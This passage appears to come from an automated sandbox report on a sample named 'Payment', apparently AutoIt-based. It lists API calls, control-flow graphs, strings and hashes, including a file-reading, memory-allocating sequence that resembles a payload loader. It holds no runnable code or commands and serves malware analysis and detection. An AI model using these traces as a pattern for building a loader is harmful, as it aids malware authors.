                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 223aa360e306f2efe440517db8526e304132ac5b616dfb3cd8e1a73262d1e9a9
                                                          • Instruction ID: 0afd342a4bee04dcdc16cee532da9d57611e9491dca69ee2dc3d8aeff35f7bad
                                                          • Opcode Fuzzy Hash: 223aa360e306f2efe440517db8526e304132ac5b616dfb3cd8e1a73262d1e9a9
                                                          • Instruction Fuzzy Hash: 3B3147B184130AAFDB40CFA4DD89BD9BBF0FB09311F1445AAE580E72A0EBB50585CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AD3074
                                                          • RegisterClassExW.USER32(00000030), ref: 00AD309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AD30AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AD30CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AD30DC
                                                          • LoadIconW.USER32(000000A9), ref: 00AD30F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AD3101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 0e1f1096f50969016274b4a90ce6ed219623ada483f626cd049e2c222881e0c3
                                                          • Instruction ID: 95c44a3799908dfc35a47ca9b71836dae5f8747a646b8df717edbfb4d488d23d
                                                          • Opcode Fuzzy Hash: 0e1f1096f50969016274b4a90ce6ed219623ada483f626cd049e2c222881e0c3
                                                          • Instruction Fuzzy Hash: D021AEB1911319AFDB009FA4E989BEEBBF4FB09711F04416BFA11A72A0DBB145448F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00AD4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B962F8,?,00AD37C0,?), ref: 00AD4882
                                                            • Part of subcall function 00AF074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AD72C5), ref: 00AF0771
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AD7308
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B0ECF1
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B0ED32
                                                          • RegCloseKey.ADVAPI32(?), ref: 00B0ED70
                                                          • _wcscat.LIBCMT ref: 00B0EDC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 1ad81a749d85c7d1199d9b64355adcb2a39296e5eefccc3855d316972fc9f43b
                                                          • Instruction ID: 483058fef76b34be3e2b058bce3c0c397aca8f5be1002a8de40f317d3e47713d
                                                          • Opcode Fuzzy Hash: 1ad81a749d85c7d1199d9b64355adcb2a39296e5eefccc3855d316972fc9f43b
                                                          • Instruction Fuzzy Hash: 62717B714683059EC314EF65DE819AFBBE8FF49340B44096FF456872A1EF309948CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AD3A62
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00AD3A71
                                                          • LoadIconW.USER32(00000063), ref: 00AD3A88
                                                          • LoadIconW.USER32(000000A4), ref: 00AD3A9A
                                                          • LoadIconW.USER32(000000A2), ref: 00AD3AAC
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AD3AD2
                                                          • RegisterClassExW.USER32(?), ref: 00AD3B28
                                                            • Part of subcall function 00AD3041: GetSysColorBrush.USER32(0000000F), ref: 00AD3074
                                                            • Part of subcall function 00AD3041: RegisterClassExW.USER32(00000030), ref: 00AD309E
                                                            • Part of subcall function 00AD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AD30AF
                                                            • Part of subcall function 00AD3041: InitCommonControlsEx.COMCTL32(?), ref: 00AD30CC
                                                            • Part of subcall function 00AD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AD30DC
                                                            • Part of subcall function 00AD3041: LoadIconW.USER32(000000A9), ref: 00AD30F2
                                                            • Part of subcall function 00AD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AD3101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: ea4e099054ba43c5f4cd085aaaed3b586294aee71f3897b505fc3381b92d1e71
                                                          • Instruction ID: 0ed9ee28e48f3520734b7c6b84cd17fed0cb1ebf35689a31b65a6392a10af06b
                                                          • Opcode Fuzzy Hash: ea4e099054ba43c5f4cd085aaaed3b586294aee71f3897b505fc3381b92d1e71
                                                          • Instruction Fuzzy Hash: 95212D71D00305AFDB149FA4EE49B9D7FB4FB08711F0041ABE504A72B0DBBA59549F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 767 ad3633-ad3681 769 ad36e1-ad36e3 767->769 770 ad3683-ad3686 767->770 769->770 773 ad36e5 769->773 771 ad3688-ad368f 770->771 772 ad36e7 770->772 774 ad375d-ad3765 PostQuitMessage 771->774 775 ad3695-ad369a 771->775 777 ad36ed-ad36f0 772->777 778 b0d31c-b0d34a call ae11d0 call ae11f3 772->778 776 ad36ca-ad36d2 DefWindowProcW 773->776 785 ad3711-ad3713 774->785 781 ad36a0-ad36a2 775->781 782 b0d38f-b0d3a3 call b32a16 775->782 784 ad36d8-ad36de 776->784 779 ad3715-ad373c SetTimer RegisterWindowMessageW 777->779 780 ad36f2-ad36f3 777->780 814 b0d34f-b0d356 778->814 779->785 788 ad373e-ad3749 CreatePopupMenu 779->788 786 ad36f9-ad370c KillTimer call ad44cb call ad3114 780->786 787 b0d2bf-b0d2c2 780->787 789 ad36a8-ad36ad 781->789 790 ad3767-ad3776 call ad4531 781->790 782->785 807 b0d3a9 782->807 785->784 786->785 793 b0d2c4-b0d2c6 787->793 794 b0d2f8-b0d317 MoveWindow 787->794 788->785 796 b0d374-b0d37b 789->796 797 ad36b3-ad36b8 789->797 790->785 801 b0d2e7-b0d2f3 SetFocus 793->801 802 b0d2c8-b0d2cb 793->802 794->785 796->776 804 b0d381-b0d38a call b2817e 796->804 805 ad36be-ad36c4 797->805 806 ad374b-ad375b call ad45df 797->806 801->785 802->805 810 b0d2d1-b0d2e2 call ae11d0 802->810 804->776 805->776 805->814 806->785 807->776 810->785 814->776 818 b0d35c-b0d36f call ad44cb call ad43db 814->818 818->776
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00AD36D2
                                                          • KillTimer.USER32(?,00000001), ref: 00AD36FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AD371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AD372A
                                                          • CreatePopupMenu.USER32 ref: 00AD373E
                                                          • PostQuitMessage.USER32(00000000), ref: 00AD375F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: e63e686d42c43e168142be7580ce28544f7e5523c8a85d3937f1b6ba652aed47
                                                          • Instruction ID: df45dbaa61df4d8263c1eaf279e139e140ad594043356c86c4afe16e299da605
                                                          • Opcode Fuzzy Hash: e63e686d42c43e168142be7580ce28544f7e5523c8a85d3937f1b6ba652aed47
                                                          • Instruction Fuzzy Hash: 4241E4B3204605BBDF149F68ED49B7A3BA9EB04341F14016BF603973E2DE60EE509663
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                          • API String ID: 1825951767-3513169116
                                                          • Opcode ID: cf3a040345fc77b0622c1e82ac789131d76446c158d959fe4abcdafa62ae57b9
                                                          • Instruction ID: a8275701a637aa9fed3c349defa0ea150d5aa5f37c041f66368eab355f9eb704
                                                          • Opcode Fuzzy Hash: cf3a040345fc77b0622c1e82ac789131d76446c158d959fe4abcdafa62ae57b9
                                                          • Instruction Fuzzy Hash: BBA14A7681022D9ACF04EBA0CD95AEEB7B8BF14340F14056BF413B7291EF749A09CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 942 2142640-21426ee call 2140000 945 21426f5-214271b call 2143550 CreateFileW 942->945 948 2142722-2142732 945->948 949 214271d 945->949 954 2142734 948->954 955 2142739-2142753 VirtualAlloc 948->955 950 214286d-2142871 949->950 952 21428b3-21428b6 950->952 953 2142873-2142877 950->953 956 21428b9-21428c0 952->956 957 2142883-2142887 953->957 958 2142879-214287c 953->958 954->950 961 2142755 955->961 962 214275a-2142771 ReadFile 955->962 963 2142915-214292a 956->963 964 21428c2-21428cd 956->964 959 2142897-214289b 957->959 960 2142889-2142893 957->960 958->957 967 214289d-21428a7 959->967 968 21428ab 959->968 960->959 961->950 969 2142773 962->969 970 2142778-21427b8 VirtualAlloc 962->970 965 214292c-2142937 VirtualFree 963->965 966 214293a-2142942 963->966 971 21428d1-21428dd 964->971 972 21428cf 964->972 965->966 967->968 968->952 969->950 973 21427bf-21427da call 21437a0 970->973 974 21427ba 970->974 975 21428f1-21428fd 971->975 976 21428df-21428ef 971->976 972->963 982 21427e5-21427ef 973->982 974->950 979 21428ff-2142908 975->979 980 214290a-2142910 975->980 978 2142913 976->978 978->956 979->978 980->978 983 21427f1-2142820 call 21437a0 982->983 984 2142822-2142836 call 21435b0 982->984 983->982 990 2142838 984->990 991 214283a-214283e 984->991 990->950 992 2142840-2142844 FindCloseChangeNotification 991->992 993 214284a-214284e 991->993 992->993 994 2142850-214285b VirtualFree 993->994 995 214285e-2142867 993->995 994->995 995->945 995->950
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02142711
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02142937
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2157017253.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2140000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                          • Instruction ID: 89e00b3e23a99cfc804d45894ed607fdc48da0a8da8f7a0c26b89250c1cf58ac
                                                          • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                          • Instruction Fuzzy Hash: F8A10C74E40209EBDB14CFA4C894BEEBBB5FF48305F208569E519BB280DB759A81CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1073 ad39e7-ad3a57 CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AD3A15
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AD3A36
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AD3A4A
                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AD3A53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 951093aaec0ce519f78bba1404b31175296e5d03b9d96b8e001a6c744a263595
                                                          • Instruction ID: a76698a1e1fb66da2be0968e56a3370a16470672c3746f9b27f1b6740c2ef3c2
                                                          • Opcode Fuzzy Hash: 951093aaec0ce519f78bba1404b31175296e5d03b9d96b8e001a6c744a263595
                                                          • Instruction Fuzzy Hash: F9F03471600290BEEA301B23AC08F377F7DE7CAF51F01006ABA00E31B0CAA61801CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1074 2142410-2142538 call 2140000 call 2142300 CreateFileW 1081 214253f-214254f 1074->1081 1082 214253a 1074->1082 1085 2142556-2142570 VirtualAlloc 1081->1085 1086 2142551 1081->1086 1083 21425ef-21425f4 1082->1083 1087 2142574-214258b ReadFile 1085->1087 1088 2142572 1085->1088 1086->1083 1089 214258d 1087->1089 1090 214258f-21425c9 call 2142340 call 2141300 1087->1090 1088->1083 1089->1083 1095 21425e5-21425ed ExitProcess 1090->1095 1096 21425cb-21425e0 call 2142390 1090->1096 1095->1083 1096->1095
                                                          APIs
                                                            • Part of subcall function 02142300: Sleep.KERNELBASE(000001F4), ref: 02142311
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0214252E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2157017253.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2140000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: GHB7KAEWCJPJCOR28XAUZM
                                                          • API String ID: 2694422964-2231746845
                                                          • Opcode ID: 161383973097281825f5d0544ba1eeb963224049c0e9d36b41ef2ec6388c2f94
                                                          • Instruction ID: 0fe2bd9f4738a1de79afe6b276e22d83f72cd44cccf5f02a038e18372d13324e
                                                          • Opcode Fuzzy Hash: 161383973097281825f5d0544ba1eeb963224049c0e9d36b41ef2ec6388c2f94
                                                          • Instruction Fuzzy Hash: CF518470D44289EBEF11DBA4C864BEFBBB5AF15304F004199E6097B2C1DBB91B44CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1098 ad410d-ad4123 1099 ad4129-ad413e call ad7b76 1098->1099 1100 ad4200-ad4204 1098->1100 1103 ad4144-ad4164 call ad7d2c 1099->1103 1104 b0d5dd-b0d5ec LoadStringW 1099->1104 1106 b0d5f7-b0d60f call ad7c8e call ad7143 1103->1106 1109 ad416a-ad416e 1103->1109 1104->1106 1116 ad417e-ad41fb call af3020 call ad463e call af2ffc Shell_NotifyIconW call ad5a64 1106->1116 1120 b0d615-b0d633 call ad7e0b call ad7143 call ad7e0b 1106->1120 1110 ad4205-ad420e call ad81a7 1109->1110 1111 ad4174-ad4179 call ad7c8e 1109->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B0D5EC
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          • _memset.LIBCMT ref: 00AD418D
                                                          • _wcscpy.LIBCMT ref: 00AD41E1
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD41F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: 81b6248fec2ffceacea22acbf58d4ebdd6a8055ad68751457b6a9da01d8c9f22
                                                          • Instruction ID: 4e388f83aeae2bf86018058f8a1f0957ee93f03ccbd8951d54fc8719fe0d82f1
                                                          • Opcode Fuzzy Hash: 81b6248fec2ffceacea22acbf58d4ebdd6a8055ad68751457b6a9da01d8c9f22
                                                          • Instruction Fuzzy Hash: 1F31B171408314ABD725EB60DE46BEF77E8AF48300F10461FF586932A1EF74AA48C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1133 af564d-af5666 1134 af5668-af566d 1133->1134 1135 af5683 1133->1135 1134->1135 1136 af566f-af5671 1134->1136 1137 af5685-af568b 1135->1137 1138 af568c-af5691 1136->1138 1139 af5673-af5678 call af8d68 1136->1139 1141 af569f-af56a3 1138->1141 1142 af5693-af569d 1138->1142 1149 af567e call af8ff6 1139->1149 1145 af56a5-af56b0 call af3020 1141->1145 1146 af56b3-af56b5 1141->1146 1142->1141 1144 af56c3-af56d2 1142->1144 1147 af56d9 1144->1147 1148 af56d4-af56d7 1144->1148 1145->1146 1146->1139 1151 af56b7-af56c1 1146->1151 1152 af56de-af56e3 1147->1152 1148->1152 1149->1135 1151->1139 1151->1144 1155 af57cc-af57cf 1152->1155 1156 af56e9-af56f0 1152->1156 1155->1137 1157 af56f2-af56fa 1156->1157 1158 af5731-af5733 1156->1158 1157->1158 1159 af56fc 1157->1159 1160 af579d-af579e call b00df7 1158->1160 1161 af5735-af5737 1158->1161 1162 af57fa 1159->1162 1163 af5702-af5704 1159->1163 1167 af57a3-af57a7 1160->1167 1165 af575b-af5766 1161->1165 1166 af5739-af5741 1161->1166 1174 af57fe-af5807 1162->1174 1172 af570b-af5710 1163->1172 1173 af5706-af5708 1163->1173 1170 af576a-af576d 1165->1170 1171 af5768 1165->1171 1168 af5743-af574f 1166->1168 1169 af5751-af5755 1166->1169 1167->1174 1175 af57a9-af57ae 1167->1175 1176 af5757-af5759 1168->1176 1169->1176 1177 af576f-af577b call af4916 call b010ab 1170->1177 1178 af57d4-af57d8 1170->1178 1171->1170 1172->1178 1179 af5716-af572f call b00f18 1172->1179 1173->1172 1174->1137 1175->1178 1180 af57b0-af57c1 1175->1180 1176->1170 1194 af5780-af5785 1177->1194 1181 af57ea-af57f5 call af8d68 1178->1181 1182 af57da-af57e7 call af3020 1178->1182 1193 af5792-af579b 1179->1193 1185 af57c4-af57c6 1180->1185 1181->1149 1182->1181 1185->1155 1185->1156 1193->1185 1195 af580c-af5810 1194->1195 1196 af578b-af578e 1194->1196 1195->1174 1196->1162 1197 af5790 1196->1197 1197->1193
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                          • Instruction ID: 0fe22aad52e53c050e1c1c3a59f1be113d09a83a964e1ff95354d0be647f14a7
                                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                          • Instruction Fuzzy Hash: ED516F30E00B0DDBDB24AFF9888467E77B5AF40320F688A29FB35962D0D7709D518B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AD4F6F
                                                          • _free.LIBCMT ref: 00B0E68C
                                                          • _free.LIBCMT ref: 00B0E6D3
                                                            • Part of subcall function 00AD6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AD6D0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                          • API String ID: 2861923089-1757145024
                                                          • Opcode ID: b4e3b411387a3fcfbd4942fe1a70e93c808c9096fb7d2d876617a3281f11eaa1
                                                          • Instruction ID: adf2dba085eb63e3ec3b63a4a9217bc63c10d7bc27aacafadf934c9dbe152866
                                                          • Opcode Fuzzy Hash: b4e3b411387a3fcfbd4942fe1a70e93c808c9096fb7d2d876617a3281f11eaa1
                                                          • Instruction Fuzzy Hash: 0F916071910219AFCF14DFA4DD919EDBBB4FF19310F1448AAF826AB2A1DB31D904CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AD35A1,SwapMouseButtons,00000004,?), ref: 00AD35D4
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AD35A1,SwapMouseButtons,00000004,?,?,?,?,00AD2754), ref: 00AD35F5
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00AD35A1,SwapMouseButtons,00000004,?,?,?,?,00AD2754), ref: 00AD3617
                                                          Strings
